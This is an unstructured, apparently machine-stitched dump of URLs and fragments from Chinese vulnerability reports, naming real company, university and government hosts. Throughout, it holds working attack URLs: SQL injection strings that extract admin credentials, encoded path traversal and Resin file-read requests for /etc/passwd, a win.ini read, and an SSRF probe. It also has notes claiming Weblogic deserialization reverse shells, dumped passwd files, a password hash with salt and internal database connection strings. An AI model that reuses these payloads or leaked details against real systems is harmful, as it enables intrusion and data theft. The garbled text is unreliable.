http://www.gofull.com.cn/):共富网是由一群致力于普惠金融和金融民主化的中国式合伙人团队创立,团队成员拥有国内外一流著名高校学历背景,各自在银行、小额贷款、融资担保、基金、保险以及上市金融IT公司等金融行业积累了丰富实战和管理经验,熟悉中国当前的信用环境和中小企业的融资困境,同时又怀揣“实现让人人享有平等投资权”的梦想。共富网拥有投资超千万级的风控、交易平台系统,专业的金融行业软件开发团队和运维团队,与阿里云、国际知名资信评估公司、全国性商业银行、领先的国有第三方支付公司合作,实现资金安全、网络安全、系统安全、数据安全。(官网介绍) http://**.**.**.**/graVoxCourse/index.php/gquery/MainPage?DPGCODE=R1-12101&INYEAR=104 http://meta.yy.com/ http://meta.yy.com/back/admin/ https://**.**.**.**//tw/news-tw?keyword=1&search_month=all&search_year=all&start=1 http://**.**.**.** 
http://**.**.**.**:8008/student/studyinfo?xxzh=51189710 http://**.**.**.**:8008/student/studyinfo?xxzh=51189710 http://**.**.**.**:8008/student/studyinfo?xxzh=51189711 http://**.**.**.**/web.rar http://**.**.**.**/manage/login.aspx http://**.**.**.**/UpFile/2010-07-21_251859458.asp http://fw.huhoo.com/index.php/ajax/getlist?callback=jQuery19105914390394464135_1447911702806&huhoo_caseid=11&id=3360&parentid=3360&_=1447911702807 http://www.noahedu.com/services-feedback.shtml http://**.**.**.**/bugs/wooyun-2010-0144850 http://**.**.**.**/bugs/wooyun-2010-0155584 http://**.**.**.**/bugs/wooyun-2010-0144850 http://**.**.**.**:7001/sims/ http://**.**.**.**:7001/sims/chgpwd.htm http://chemsrsp.cqvip.com/bq4sql?namecn=-1 http://**.**.**.**/ http://**.**.**.**/sys/portal/page.jsp http://web.jingoal.com/#workbench~type=contact http://tian.shnu.edu.cn http://123.103.9.77/WebLogin.aspx http://123.103.9.77/User_Regist.aspx http://os.wasu.cn/liuchen/editsq.php?id=1 http://os.wasu.cn/liuchen/editsq.php?id=1 http://**.**.**.**/egovhall/default.aspx?tabid=342 http://sbc.ecnu.edu.cn/caigou.asp?parentID=1309 COLUMNS:id,custno,password,bindtime,openid,userid,keyboat COLUMNS:id,cardid,hphm,instation,outstation,type,price,exchangetime,issend,intime,updatetime,recordtype,cardbalance,cartype,province,cardtype http://60.10.8.227:88/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://pyh.luckyair.net:80/ http://**.**.**.** http://**.**.**.**:80/ http://alum.sz.tsinghua.edu.cn/getMbyx.jsp?userid=-1 B08E9B04CCAA921EF53A517D9B444291:FG=1 http://211.150.65.155:7001/开始看到以为是网易的.发现所用的服务端是weblogic的.试了下最新的java反序列执行漏洞.直接成功。反弹出来后发现是cntv。查看80端口却也是cntv的 http://221.8.57.106:7004/console http://221.8.57.106:7006/console http://221.8.57.106:7004/ca/ma3.jsp jdbc:oracle:thin:@10.0.7.101:1521:ahdb http://v.huatu.com/api/ccmobilev2/Public/freeVideo/liveFree.php?&userid=4473332&rid=1632;WAITFOR http://alumni.sz.tsinghua.edu.cn/structure/?do=listframe&group_id=361&page=list http://125.69.85.24/ 
http://api.bilibili.com/favourite/add?fav_box=0&id=视频ID http://interface.bilibili.com/feedback/post?aid=AV号&action=send"eID=&msg=评论内容 http://www.bilibili.com/plus/comment.php http://**.**.**.**/manage/index.php http://123.103.9.112/login.jsp http://123.103.9.112/secure/Signup!default.jspa http://idm2.tcl.com:8088/manager https://mail.wasu.com/bookmark.jsp?command=delete&bookmarkselect=2 https://mail.wasu.com/bookmark.jsp?command=delete&bookmarkselect=2 http://124.205.224.180:7001 http://bbs.ticwear.com/.git/服务器返回403说明文件存在,接下来用上git神器,获得所有的源码 http://bioinfo.au.tsinghua.edu.cn http://218.106.129.50/nt/aspx/1/readme.aspx?selectedtemplateid=1 http://218.108.255.183/UserLogin/Login.aspx http://daojia.com.cn/list_rest.php?a=0&s=2 http://**.**.**.**:80/ http://**.**.**.**:81/company/ShowJobs.aspx?Fid=107978&ZwId=167260 www.yunshan.net.cn,访问后会跳转至2cloud.com https://2cloud.com/ https://cms.2cloud.com/ inurl:/sfs3/modules/ http://101.227.9.199/jenkins/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:134:134:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin saslauth:x:499:76:"Saslauthd 
saslauth:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin app_admin:x:500:500::/home/app_admin:/bin/bash community:x:501:501::/home/community:/bin/bash dlord:x:502:502::/home/dlord:/bin/bash douhua:x:503:503::/home/douhua:/bin/bash jifadmin:x:504:504::/home/jifadmin:/bin/bash vip:x:505:505::/home/vip:/bin/bash feeportal:x:506:506::/home/feeportal:/bin/bash uis:x:507:507::/home/uis:/bin/bash toodou:x:508:508::/home/toodou:/bin/bash xpage:x:509:509::/home/xpage:/bin/bash channelpage:x:510:510::/home/channelpage:/bin/bash cms:x:511:511::/home/cms:/bin/bash mycenter:x:512:512::/home/mycenter:/bin/bash watch:x:513:513::/home/watch:/bin/bash jmq:x:514:514::/home/jmq:/bin/bash subscription:x:515:515::/home/subscription:/bin/bash usersrv:x:516:516::/home/usersrv:/bin/bash useritemsrv:x:517:517::/home/useritemsrv:/bin/bash nliu:x:518:518::/home/nliu:/bin/bash mutualupload:x:519:519::/home/mutualupload:/bin/bash cos:x:520:520::/home/cos:/bin/bash wt_test:x:521:521::/home/wt_test:/bin/bash vsgManager:x:522:522::/home/vsgManager:/bin/bash vsgcms:x:523:523::/home/vsgcms:/bin/bash mysql:x:524:524::/home/mysql:/bin/bash jenkins:x:525:525::/home/jenkins:/bin/bash http://101.227.9.130:8080/browse/CC#selectedTab=com.atlassian.jira.plugin.system.project%3Acomponents-panel http://hanhong.swu.edu.cn/ http://hanhong.swu.edu.cn http://analysis.anquanbao.com/c.php http://analysis.anquanbao.com/a.php http://analysis.anquanbao.com/s.php http://hunlian.cn/ http://122.224.6.58:3333 
http://122.224.6.58:3333/avatar.swf http://os.wasu.cn/liuchen/sq.php?id=1 http://os.wasu.cn/liuchen/sq-bd.php?id=1 http://os.wasu.cn/liuchen/sq.php?id=1 https://github.com/fucifer/learn/blob/07f3ddd8bf3568d1033cf040792912b9e0023a34/dphd/src/main/resources/env/config.properties http://www.gzl.com.cn/b2c-web/member/order/201511260000289/Tour.html http://**.**.**.** http://efe.baidu.com/ http://efe.baidu.com/efe.zip http://**.**.**.**/wsks/admin.asp http://**.**.**.**/module/ViewNews.asp?ArticleID=3zbtfb201111239403 http://js.crland.com.cn/project.aspx?mid=4-0&pid=20&id=24&cpath=2 http://**.**.**.**/aqcp/aqgl/ldsmglxttopscanner/ http://online.suning.com/console/Service/Console/Index http://online.suning.com/console/Service/supplieradmin/customerIndex http://**.**.**.**/bugs/wooyun-2015-0152363/trace/3bf1826591c4373d8851ac9f18096a03 http://**.**.**.** http://xianchang03.danmu.tudou.com/login.do http://www.slimframework.com/ http://www.slimframework.com/docs/objects/request.html#the-request-body http://zone.wooyun.org/content/19908 https://github.com/longlijian/hdf-client/tree/f410e709b8a4e7ad0bb8f5b2e355c9f5fbc5e110/v3.15.103 http://210.51.167.101/.svn/entries http://z.ziroom.com/.DS_Store http://210.51.167.189/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sun:x:500:500:sunyang:/home/sun:/bin/bash mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash bwlnlHkF2wxxQ21:16732:0:99999:7 http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderExecute.action?id=49733606 http://**.**.**.**/product/products.php?cid=3 http://www.e-soochowlife.com http://wangxindai.cn/invest/full_success/a20150900003.html http://oa.daojia.58.com/seeyon/main.do?method=main http://**.**.**.**/bugs/wooyun-2010-0142772 http://123.59.1.149/zabbix/ http://www.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://tjlog.ps.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://service.pay.easou.com:8000/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://searchapi.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://kanpian.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://www2.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp 
http://appdispatch.ps.easou.com/resin-doc/examples/security-basic/viewfile?file=index.jsp http://appdispatch.ps.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://bookwebview.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://dapk.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://videoapi.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://bookwebview.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://dapk.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ec3.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ir.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://wap.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://hd.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://wap.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://f.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://da.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://jipiao.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://wan.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ec.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://pic.ps.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ads.ml.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ads.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://am.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ads.easou.com:8080/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp 
http://shu.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://a.ml.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://a.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://m.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://tq.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jpp http://l.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://fk.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://news.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://n.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://news.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://183.232.129.84/.svn/entries http://183.232.129.83/.svn/entries http://120.197.138.69/info.php http://120.197.138.69/.svn/entries http://mydata.51cdn.com:8888/getIp.php?sername=suning&channel=www.suning.cn&passwd=6b3454d97580487b40******2c9d1b5c  http://mydata.51cdn.com:8888/getIp.php?username=suning&channel=image.suning.cn&passwd=cac74a1ac16e578******1985ea69e03 http://mydata.51cdn.com:8888/getIp.php?username=suning&channel=image1.suning.cn&passwd=2e03f78e12a8b4******2740ff1c3968 http://103.255.95.182:8088 http://103.255.95.182:8088/logs/hadoop-root-namenode-master01.hadoop.log https://passport.ganji.com/login.php?next=http%3A%2F%2Fwww.ganji.com%2Fsite%2Fu%2F http://fangvip.ganji.com/auth.php?do=login http://fangvip.ganji.com http://web.jingoal.com/#worklog http://**.**.**.**/ http://**.**.**.**:80/ http://www.taowola.com/list.php?cid=2 http://www.taowola.com/list.php?mid=1&cid= http://**.**.**.**/up/ 
http://**.**.**.**/Chart/OilChart.aspx?ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=c:\windows\win.ini http://**.**.**.**/struts1hibernate/address_edit.do?method=edit&id=27022 http://www.x-lab.tsinghua.edu.cn/?a=projectshow&c=nurture&id=229 http://report.chinapnr.com存在Weblogic,这个版本存在java远程命令执行漏洞 http://**.**.**.**/forget/forget_way.htm http://www.lagou.com/gongsi/100827.html http://www.kouyuliao.com/ http://m.flyertrip.com/ http://m.flyertrip.com/index.php/Admin/Login/login.html http://idstar.xmu.edu.cn/amserver/UI/Login http://i.xmu.edu.cn http://inc2.xmu.edu.cn/handbook/public/24/看到vpn设置 http://**.**.**.**/old/comm_serv_detail.php?id=105 http://**.**.**.**/comm_serv_detail.php?id=101 http://**.**.**.**/comm_serv_detail.php?id=4 http://**.**.**.**/jiannren/comm_serv_detail.php?id=5 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/comm_serv_detail.php?id=10 http://**.**.**.**/comm_serv_detail.php?id=1791 http://**.**.**.**/06/comm_serv_detail.php?id=4 http://**.**.**.**/prod_detail.php?item_id=953 http://**.**.**.**/prod_detail.php?item_id=30 http://**.**.**.**/prod_detail.php?item_id=7 http://**.**.**.**/prod_detail.php?item_id=9 http://**.**.**.**/prod_detail.php?item_id=9796 http://**.**.**.**/ch/prod_detail.php?item_id=76 http://**.**.**.**/prod_detail.php?item_id=1 http://**.**.**.**/prod_detail.php?item_id=8 http://**.**.**.**/prod_detail.php?item_id=3826 http://**.**.**.**/ch/prod_detail.php?item_id=29 http://**.**.**.**/tuningwork-shop/prod_detail.php?item_id=121 http://**.**.**.**/prod_detail.php?item_id=35 http://**.**.**.**/prod_detail.php?item_id=324 http://**.**.**.**/prod_detail.php?item_id=147 http://**.**.**.**/prod_detail.php?item_id=17 http://**.**.**.**/prod_detail.php?item_id=2 http://**.**.**.**/prod_detail.php?item_id=1 http://**.**.**.**/prod_detail.php?item_id=44 http://**.**.**.**/ch/prod_detail.php?item_id=26 http://**.**.**.**/prod_detail.php?item_id=860 http://hg.airchinacargo.com/ 
http://**.**.**.**/JspBack/User_top.jsp?userid=xzh618 http://www.flyertrip.com/hotels/personalCenter/myOrderAll.php,在搜索框随便搜索点东西,比如"t"。 http://www.flyertrip.com/hotels/personalCenter/myOrder.php?condition=t http://www.flyertrip.com/hotels/personalCenter/orderDetail.php?flag=detail&id=7095 http://www.flyertrip.com/hotels/personalCenter/orderDetail.php?flag=detail&id=7095 http://www.cpsri.com.cn/ http://jf.ztgame.com/tmp/config.txt,数据库配置可以直接查看 http://os.wasu.cn/new/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://www.gzl.com.cn/b2c-web/account/checkAccountName.json?mobileNo=XXXXXX http://wsbm.shnu.edu.cn http://dbs.arch.tsinghua.edu.cn/dbs/index.php?category=news&display=trends&id=25 http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:orcl http://www.flyertrip.com/hotels/book.php http://games.mobileapi.hupu.com/3/7.0.4/quiz/getRankingListAjax?token=xxxd&client=xxx=1&pid=151099%27/**/union/**/select http://**.**.**.**上,问题文件 http://**.**.**.**/fileupload/FileUpload.htm http://**.**.**.**/fileupload/filename.ext http://mju.ss.cqvip.com/library/page/ajax.aspx?action=CheckUserExsit&flag=0¶m=0.5561432782560587&values=-1 http://www.flyertrip.com/hotels/personalCenter/ticketdetail.php?id=ORID144844004777183 http://aaa.daojia.com.cn http://www.flyertrip.com/hotels/personalCenter/myAccount.php修改密码 http://qiyuan.tsinghua.edu.cn http://m.v.huatu.com/netclass/search.php?action=search http://eelab.tsinghua.edu.cn/content/index.php?act=catelist&keyword=-1 http://cafe.baidu.com http://gzzb.kingsoft.com http://**.**.**.**/jianjie_moban.jsp?BigClassID=3&SmallClassID=29&NewsID=11757 http://**.**.**.**/jianjie_moban.jsp?BigClassID=1&SmallClassID=7&NewsID=2510%20SmallClassID=7 
http://**.**.**.**/jianjie_moban.jsp?BigClassID=2&SmallClassID=15&threeClassID=11&NewsID=3656%20SmallClassID=15 http://**.**.**.**/jianjie_moban.jsp?BigClassID=1&SmallClassID=7 http://new.conqueror.cn/command/ajax/ajax.php?func=get_info&id=650&row=characteristic http://webgame.ali213.net http://supplychain.app.com.cn:7001/eipp_app/security/login.hlt http://supplychain.app.com.cn:7001/console/login/LoginForm.jsp http://wwx.jufangbian.com/wx/so/detail.html?id=10211 http://auto.hualongxiang.com/shop?aid=1&bid=48 http://***_llt.umpay.com/duihuan.php?status=2&id=35317 http://user.rayli.com.cn/member.php?mod=getpasswd&uid=&id= cn:2051 UserManagement.svc/LoginForWebUser cn:2051 http://www.iugame.cn//isgame/sjhd/ajax.aspx http://news.jlu.edu.cn/new/?keyword=1&mod=search http://tt.76ju.com/?action=detail&id=6171-0 http://tt.76ju.com/?action=detail&id=6171-0 http://**.**.**.**/ http://**.**.**.**/journalx/editorInChiefLogOn.action http://**.**.**.**/journalx/admin/UserGroup.action http://**.**.**.**/journalx/admin/User.action?method=edit&id=6001 http://**.**.**.**/journalx/editorLogOn.action http://**.**.**.**/journalx/manuscript/ListManuscriptFromEditorDeskTop.action?sorter.field=2&sorter.order=desc http://**.**.**.**/journalx/basicinfo/Person!lists.action?blank=%27extend%27&rolsesp=6 http://jiayingxb.**.**.**.**:80/ http://wh.xf.fangtoon.com/index.php?r=XfActive/Detail&id=2%27%20and%201=1 http://help.eventdove.com http://help.eventdove.com/wp-login.php?loggedout=true http://www.nbopen.com.cn/index.php?s=/Train/views/id/6* http://sqlmap.org http://**.**.**.**/glxx/index.gl?id=2110 http://www.oppo.com/my/supports/imei-check/check_imei.php?ino=e http://**.**.**.**/ProcList.aspx?CPLX=%E4%BF%A1%E6%89%98%E4%BA%A7%E5%93%81&K=1%27%20and%201=@@version http://www.ie.tsinghua.edu.cn/students/index_list.php?key=&newsorder=sendtime&StartPage=532&ty=62 http://lpms-jf-stg.wanlitong.com/solr/admin 
jdbc:mysql://192.168.14.90:3306/db_wlt_goods?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true mail.tsinghua.edu.cn/liuwansen http://my2.wanbang.net:6888 http://gts.zte.com.cn:7001 http://espel.sem.tsinghua.edu.cn/public/faq_show.php?id=1 http://os.wasu.cn/lx/editemployee.php?id=1 http://www.yichengpin.com http://www.yichengpin.com/address/address-addAddress.do http://**.**.**.**/recommend.php?a=detail&rid=3299 http://**.**.**.**/xyschool/?a=t_detail&id=29 http://**.**.**.**/knowledge.php?a=detail&tid=52675 http://**.**.**.**/bbs.php?a=detail&did=357 http://**.**.**.**/bbs.php?a=bbs_quan&qid=1 http://**.**.**.**/baike.php?a=detail&kid=35 http://wiki.eloancn.com/login.action?logout=true http://open.wanlitong.com https://open.wanlitong.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.20.61:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://**.**.**.**/index.php?mod=article&category_id=22&article_id=37541 http://**.**.**.**/index.php?mod=article&category_id=22&article_id=37541 http://**.**.**.** http://**.**.**.**/defaultroot/portal.jsp http://**.**.**.**/defaultroot/work_flow/jsFileUpload.jsp http://**.**.**.**/defaultroot/devform/workflow/baidu.jsp http://www.xintai.com/web/user/resetPwd/index.jsp http://**.**.**.** http://**.**.**.**/gzzd/show.php?gzzd_id=1 http://**.**.**.**/papers/10652 http://**.**.**.**/datalist/default.aspx/article?category_id=1051 http://data.inspur.com:8011 http://**.**.**.**/Conf/jsp/user/loginAction.do http://**.**.**.**:443/Conf/jsp/main/mainAction.do http://**.**.**.**/Conf/jsp/main/mainAction.do http://**.**.**.**:82/Conf/jsp/main/mainAction.do http://payment.chinapnr.com存在Weblogic,这个版本存在java远程命令执行漏洞 http://**.**.**.**/News_Text.php?id=1082*&class_id=20 http://**.**.**.** 
https://set2.mail.qq.com/cgi-bin/viewfile?f=B44F4E6E5CB0A4CCBB0CC8200C8C6CEF6367DC612E4BC3B4&mailid=ZL3127-3JRtOe0Vqil%7EZmYwRRSAB5b&sid=XXXXXXXXXX【SID】XXXXXX&net=931323402 http://online.greatlife.cn:8001 http://open.boc.cn/manage/ http://**.**.**.**/NewList.aspx?C=10102 http://**.**.**.**/ http://**.**.**.**/sohu/shadminlist.php http://**.**.**.**/news.jsp?id=36 http://sdjc.ujn.edu.cn/ https://github.com/lip2up/mydev https://github.com/lip2up/mydev/blob/master/old/lipmail/App.config juesheng.com/js2015_1q2w,登录到CRM系统: http://**.**.**.**/system/login.do http://pn.ujn.edu.cn/ http://pn.ujn.edu.cn/news.php?id=14 http://wx.ehuatai.com/htstation/ http://wx.ehuatai.com/iesvc/iesvc.jsp http://wx.ehuatai.com/zecmd/zecmd.jsp http://**.**.**.**/ShowNewsDetail.aspx?PartDetailID=10&ArticleID=1309 http://**.**.**.**/gsgk.php?num=1 http://**.**.**.**:7001/loginback.aspx http://**.**.**.**:7001/loginback.aspx http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.**/enterprise/history_info.php?id=29 http://news.lib.tsinghua.edu.cn http://www.rsta.tsinghua.edu.cn http://**.**.**.**/?a/id/11.html http://www.apcws.tsinghua.edu.cn/?Research/id/5.html http://www.yijifen.com/ http://oa.baihe.com:3220/jsoa/login.jsp http://oa.baihe.com:3220/jsoa/WorkFlowProcAction.do?flowpara=1&search=&workTitle=&activityName=%B7%A2%C6%F0%C8%CB%B4%F2%D3%A1&submitPersonId=10026614&submitPerson=%B6%C5%BB%A2&work=10749050&workType=1&activity=1210458&table=1209987&record=10748914&processName=BH009-%BD%E8%BF%EE%C0%E0%C1%F7%B3%CC&workStatus=1011&submitTime=2015-11-23%2016:00:08.0&processId=1210437&stepCount=1&isStandForWork=0&standForUserId=0&standForUserName=null&initActivity=1210439&initActivityName=%BE%AD%C0%ED&submitPersonTime=2015-11-23%2016:00:08.0&tranType=null&tranFromPersonId=null&fromdesktop=1 https://owa.corp.gome.com.cn/ http://work.tju.edu.cn vip.wissun.com/?杨静178 http://211.94.93.4/LoginAction.do?m=goLogin https://mail.ceair.com http://**.**.**.**/file/ 
http://211.94.93.8/mail/WebmailLogin.html http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 www.chuanxindai.com http://bbs.55bbs.com/space-viewpro-uid-1.html http://bbs.55bbs.com/space-viewpro-uid-3.html http://50.18.199.171/wauthen/login http://**.**.**.**/article/detail?conCatID=416&contentID=11191 http://**.**.**.**/article/detail?conCatID=416&contentID=11191 http://**.**.**.**/news.aspx?cid=2015010001&pid=2015110013 http://**.**.**.**/s/1jG4gQvs http://**.**.**.**/hr/job.aspx http://123.232.100 system:type=ServerInfo http://123.232.100 system:type=ServerInfo http://biosafety.sysu.edu.cn http://biosafety.sysu.edu.cn http://**.**.**.**/zscq/ http://**.**.**.**/cms/index.php?r=mobile/ret&id=51674&type=article&uid=0&terminusType=2&version=2.8.7 http://app.cmiea.org http://**.**.**.**/sps/loginaction!logout.action http://**.**.**.**/sps/abSqdAction!newSqd.action?idAbSqd=255394 http://**.**.**.**/sps/getSqdclListAction!clList.action?sqdid=255395 http://www.flyertrip.com/hotels/book.php下单,随便填信息 http://106.39.17.117:8080 http://amail.swufe.edu.cn:8081/ cn:8081 http://**.**.**.**/product/detail.aspx?id=10 http://**.**.**.**/product/detail.aspx?id=10 http://votegd.gridinn.com/phpmyadmin http://116.236.239.109 http://www.sinochemjiangsu.com/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://www.sinochemjiangsu.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://**.**.**.**/index.php?option=com_content&view=article&id=110&Itemid=244&lang=zh http://**.**.**.**/index.php?option=com_content&view=article&id=110&Itemid=244&lang=zh ba22ceecc64b376a4b8d75adf9574dda:V0fo9dq1xFF9YK7cWklcZ0JDVqG2NAU3 
